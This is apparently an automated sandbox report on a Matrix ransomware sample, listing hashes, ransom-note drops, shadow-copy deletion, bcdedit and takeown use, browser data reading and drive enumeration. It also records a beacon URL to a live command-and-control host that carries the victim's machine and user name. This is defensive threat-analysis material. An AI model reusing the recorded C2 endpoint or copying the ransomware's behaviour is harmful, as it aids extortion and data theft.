matrix | ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a

Analysis

max time kernel
128s
max time network
121s
platform
windows7_x64
resource
win7v200722
submitted
08-10-2020 15:06

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
Size

1.2MB
MD5

0e527383dc50b48d63183e1176c4d79e
SHA1

c1437130dd774db14dd16c45771e7e1a484d5ee5
SHA256

ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a
SHA512

58a3edde62268c34b2577530b520559c8c8f4f085210703c59c75442b9162e396ea38973302afc3e54d6d546ccd7b246650b4e9aef137d7b7787ab3354aec457

Score

10^/10

matrix discovery evasion persistence ransomware spyware upx

Malware Config

Signatures

Matrix Ransomware 64 IoCs

Targeted ransomware with information collection and encryption functionality.

ransomware matrix

description	flow	ioc	Process
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\lib\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Public\Desktop\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jre7\lib\management\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Backup\new\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\META-INF\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\lua\intf\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Public\Music\Sample Music\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\cache2\entries\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\Favorites\Microsoft Websites\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Public\Pictures\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
HTTP URL	2	http://ghb.timerz.org/addrecord.php?apikey=BWNG_api_key&compuser=UCQFZDUI\|Admin&sid=vTDARe7q4laQTr0a&phase=START	Process not Found
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\lua\meta\reader\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Setup Files\{AC76BA86-7AD7-1033-7B44-A90000000001}\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\Favorites\MSN Websites\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\html\dcommon\html\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Session Storage\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Storage\ext\gfdkimpbcpahaombhbimeihdjnejgicl\def\Code Cache\wasm\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\ext\locale\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jre7\lib\jfr\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cache\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.help_2.0.102.v20141007-2301\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\Favorites\Links\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\zh_TW\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extension State\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Public\Videos\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\f5hc8vjc.default-release\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\MSBuild\Microsoft\Windows Workflow Foundation\v3.0\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Google\Chrome\Application\SetupMetrics\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\fa\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\si\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\mk\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\bn\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Adobe\Color\Profiles\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins3d\prc\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\PFM\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\VideoLAN\VLC\locale\brx\LC_MESSAGES\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AMT\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Google\Update\Install\{24604DAC-26A2-4023-B42D-9AEA602FC027}\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\js\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files\Java\jdk1.7.0_80\jre\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Program Files (x86)\Mozilla Maintenance Service\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File created		C:\Users\Admin\AppData\Roaming\Microsoft\Document Building Blocks\1033\14\!BWNG_INFO!.rtf	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1948	bcdedit.exe
220	bcdedit.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File created	C:\Windows\system32\Drivers\PROCEXP152.SYS	3w3GwRsK64.exe

Executes dropped EXE 64 IoCs

pid	Process
1848	NWrwBOhz.exe
1940	3w3GwRsK.exe
1896	3w3GwRsK.exe
1040	3w3GwRsK.exe
1048	3w3GwRsK64.exe
1492	3w3GwRsK.exe
1708	3w3GwRsK.exe
1108	3w3GwRsK.exe
1432	3w3GwRsK.exe
1516	3w3GwRsK.exe
1040	3w3GwRsK.exe
1492	3w3GwRsK.exe
2040	3w3GwRsK.exe
1228	3w3GwRsK.exe
1268	3w3GwRsK.exe
872	3w3GwRsK.exe
1952	3w3GwRsK.exe
1056	3w3GwRsK.exe
1360	3w3GwRsK.exe
1920	3w3GwRsK.exe
1480	3w3GwRsK.exe
1828	3w3GwRsK.exe
1032	3w3GwRsK.exe
1624	3w3GwRsK.exe
580	3w3GwRsK.exe
1928	3w3GwRsK.exe
2032	3w3GwRsK.exe
316	3w3GwRsK.exe
1068	3w3GwRsK.exe
1240	3w3GwRsK.exe
1708	3w3GwRsK.exe
1432	3w3GwRsK.exe
1952	3w3GwRsK.exe
1184	3w3GwRsK.exe
1540	3w3GwRsK.exe
944	3w3GwRsK.exe
320	3w3GwRsK.exe
1496	3w3GwRsK.exe
1256	3w3GwRsK.exe
1400	3w3GwRsK.exe
620	3w3GwRsK.exe
1480	3w3GwRsK.exe
316	3w3GwRsK.exe
1864	3w3GwRsK.exe
592	3w3GwRsK.exe
908	3w3GwRsK.exe
2032	3w3GwRsK.exe
1812	3w3GwRsK.exe
1228	3w3GwRsK.exe
1032	3w3GwRsK.exe
1888	3w3GwRsK.exe
684	3w3GwRsK.exe
1528	3w3GwRsK.exe
1952	3w3GwRsK.exe
592	3w3GwRsK.exe
1572	3w3GwRsK.exe
1516	3w3GwRsK.exe
932	3w3GwRsK.exe
1040	3w3GwRsK.exe
1400	3w3GwRsK.exe
1624	3w3GwRsK.exe
684	3w3GwRsK.exe
1060	3w3GwRsK.exe
1952	3w3GwRsK.exe

Modifies extensions of user files 1 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

description	ioc	Process
File opened for modification	C:\Users\Admin\Pictures\ConfirmPop.tiff	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe

Sets service image path in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x00030000000131a8-18.dat	upx
behavioral1/files/0x00030000000131a8-19.dat	upx
behavioral1/files/0x00030000000131a8-21.dat	upx
behavioral1/files/0x00030000000131a8-26.dat	upx
behavioral1/files/0x00030000000131a8-28.dat	upx
behavioral1/files/0x00030000000131a8-31.dat	upx
behavioral1/files/0x00030000000131a8-33.dat	upx
behavioral1/files/0x00030000000131a8-39.dat	upx
behavioral1/files/0x00030000000131a8-41.dat	upx
behavioral1/files/0x00030000000131a8-42.dat	upx
behavioral1/files/0x00030000000131a8-44.dat	upx
behavioral1/files/0x00030000000131a8-49.dat	upx
behavioral1/files/0x00030000000131a8-51.dat	upx
behavioral1/files/0x00030000000131a8-52.dat	upx
behavioral1/files/0x00030000000131a8-54.dat	upx
behavioral1/files/0x00030000000131a8-59.dat	upx
behavioral1/files/0x00030000000131a8-61.dat	upx
behavioral1/files/0x00030000000131a8-62.dat	upx
behavioral1/files/0x00030000000131a8-64.dat	upx
behavioral1/files/0x00030000000131a8-69.dat	upx
behavioral1/files/0x00030000000131a8-71.dat	upx
behavioral1/files/0x00030000000131a8-72.dat	upx
behavioral1/files/0x00030000000131a8-74.dat	upx
behavioral1/files/0x00030000000131a8-79.dat	upx
behavioral1/files/0x00030000000131a8-81.dat	upx
behavioral1/files/0x00030000000131a8-82.dat	upx
behavioral1/files/0x00030000000131a8-84.dat	upx
behavioral1/files/0x00030000000131a8-89.dat	upx
behavioral1/files/0x00030000000131a8-91.dat	upx
behavioral1/files/0x00030000000131a8-92.dat	upx
behavioral1/files/0x00030000000131a8-94.dat	upx
behavioral1/files/0x00030000000131a8-99.dat	upx
behavioral1/files/0x00030000000131a8-101.dat	upx
behavioral1/files/0x00030000000131a8-102.dat	upx
behavioral1/files/0x00030000000131a8-104.dat	upx
behavioral1/files/0x00030000000131a8-109.dat	upx
behavioral1/files/0x00030000000131a8-111.dat	upx
behavioral1/files/0x00030000000131a8-112.dat	upx
behavioral1/files/0x00030000000131a8-114.dat	upx
behavioral1/files/0x00030000000131a8-119.dat	upx
behavioral1/files/0x00030000000131a8-121.dat	upx
behavioral1/files/0x00030000000131a8-122.dat	upx
behavioral1/files/0x00030000000131a8-124.dat	upx
behavioral1/files/0x00030000000131a8-129.dat	upx
behavioral1/files/0x00030000000131a8-131.dat	upx
behavioral1/files/0x00030000000131a8-132.dat	upx
behavioral1/files/0x00030000000131a8-134.dat	upx
behavioral1/files/0x00030000000131a8-139.dat	upx
behavioral1/files/0x00030000000131a8-141.dat	upx
behavioral1/files/0x00030000000131a8-142.dat	upx
behavioral1/files/0x00030000000131a8-144.dat	upx
behavioral1/files/0x00030000000131a8-149.dat	upx
behavioral1/files/0x00030000000131a8-151.dat	upx
behavioral1/files/0x00030000000131a8-152.dat	upx
behavioral1/files/0x00030000000131a8-154.dat	upx
behavioral1/files/0x00030000000131a8-160.dat	upx
behavioral1/files/0x00030000000131a8-162.dat	upx
behavioral1/files/0x00030000000131a8-163.dat	upx
behavioral1/files/0x00030000000131a8-165.dat	upx
behavioral1/files/0x00030000000131a8-170.dat	upx
behavioral1/files/0x00030000000131a8-172.dat	upx
behavioral1/files/0x00030000000131a8-173.dat	upx
behavioral1/files/0x00030000000131a8-175.dat	upx
behavioral1/files/0x00030000000131a8-180.dat	upx

Loads dropped DLL 64 IoCs

pid	Process
1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
1608	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
1184	cmd.exe
1868	cmd.exe
1896	3w3GwRsK.exe
472	cmd.exe
1508	cmd.exe
964	cmd.exe
1392	cmd.exe
2028	cmd.exe
1184	cmd.exe
1540	cmd.exe
1864	cmd.exe
908	cmd.exe
1928	cmd.exe
944	cmd.exe
1528	cmd.exe
1392	cmd.exe
1472	cmd.exe
1184	cmd.exe
1824	cmd.exe
2032	cmd.exe
932	cmd.exe
112	cmd.exe
1256	cmd.exe
472	cmd.exe
1060	cmd.exe
2040	cmd.exe
1828	cmd.exe
1228	cmd.exe
1184	cmd.exe
1888	cmd.exe
1464	cmd.exe
1316	cmd.exe
324	cmd.exe
1400	cmd.exe
1628	cmd.exe
1004	cmd.exe
1392	cmd.exe
1796	cmd.exe
1540	cmd.exe
1624	cmd.exe
1464	cmd.exe
940	cmd.exe
1508	cmd.exe
112	cmd.exe
1928	cmd.exe
1932	cmd.exe
932	cmd.exe
1884	cmd.exe
1708	cmd.exe
1492	cmd.exe
1292	cmd.exe
1060	cmd.exe
384	cmd.exe
1812	cmd.exe
620	cmd.exe
1032	cmd.exe
1080	cmd.exe
1132	cmd.exe
1496	cmd.exe
1508	cmd.exe
436	cmd.exe
2032	cmd.exe

Modifies file permissions 1 TTPs 64 IoCs

discovery

File and Directory Permissions Modification

T1222

pid	Process
1032	takeown.exe
304	takeown.exe
1240	takeown.exe
1864	takeown.exe
1888	takeown.exe
112	takeown.exe
1492	takeown.exe
1272	takeown.exe
1664	takeown.exe
1952	takeown.exe
1572	takeown.exe
1736	takeown.exe
1552	Process not Found
1748	takeown.exe
384	takeown.exe
1568	takeown.exe
328	takeown.exe
1884	takeown.exe
1824	takeown.exe
1932	takeown.exe
220	takeown.exe
1748	takeown.exe
1436	takeown.exe
820	takeown.exe
1940	takeown.exe
1056	takeown.exe
1332	takeown.exe
1940	takeown.exe
684	takeown.exe
1936	takeown.exe
932	takeown.exe
1748	takeown.exe
1052	Process not Found
2028	takeown.exe
1880	takeown.exe
1708	takeown.exe
1568	Process not Found
1524	takeown.exe
752	takeown.exe
1708	takeown.exe
932	takeown.exe
1232	takeown.exe
1508	takeown.exe
1900	takeown.exe
1060	takeown.exe
1932	takeown.exe
1292	takeown.exe
220	takeown.exe
684	takeown.exe
2024	takeown.exe
224	takeown.exe
1040	takeown.exe
1080	takeown.exe
1392	takeown.exe
1916	takeown.exe
324	takeown.exe
1640	takeown.exe
364	Process not Found
1108	takeown.exe
872	takeown.exe
820	takeown.exe
1392	takeown.exe
944	takeown.exe
1568	takeown.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware

Data from Local System
T1005

Credentials in Files
T1081

Drops desktop.ini file(s) 34 IoCs

description	ioc	Process
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DUF815Z1\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Desktop\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Favorites\Links for United States\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Videos\Sample Videos\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\JSOYQ5ME\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Recorded TV\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Favorites\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Desktop\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files (x86)\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Libraries\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Recorded TV\Sample Media\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\Z1YRRYOY\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Videos\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\YAUNGDT1\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Music\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Music\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Pictures\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Links\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Downloads\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Music\Sample Music\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Videos\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Pictures\Sample Pictures\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Favorites\Links\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Public\Documents\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Program Files\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Pictures\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Contacts\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Searches\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Documents\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Downloads\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened for modification	C:\Users\Admin\Saved Games\desktop.ini	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe

Enumerates connected drives 3 TTPs 46 IoCs

Attempts to read the root path of hard drives other than the default C: drive.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
File opened (read-only)	\??\J:	3w3GwRsK64.exe
File opened (read-only)	\??\K:	3w3GwRsK64.exe
File opened (read-only)	\??\T:	3w3GwRsK64.exe
File opened (read-only)	\??\Z:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\L:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\P:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\G:	3w3GwRsK64.exe
File opened (read-only)	\??\M:	3w3GwRsK64.exe
File opened (read-only)	\??\N:	3w3GwRsK64.exe
File opened (read-only)	\??\X:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\W:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\F:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\L:	3w3GwRsK64.exe
File opened (read-only)	\??\Z:	3w3GwRsK64.exe
File opened (read-only)	\??\S:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\J:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\T:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
File opened (read-only)	\??\H:	ef03ec9954d9643d8d65afc0ace38dae463f1a626584455245f1f733b4991f4a.exe
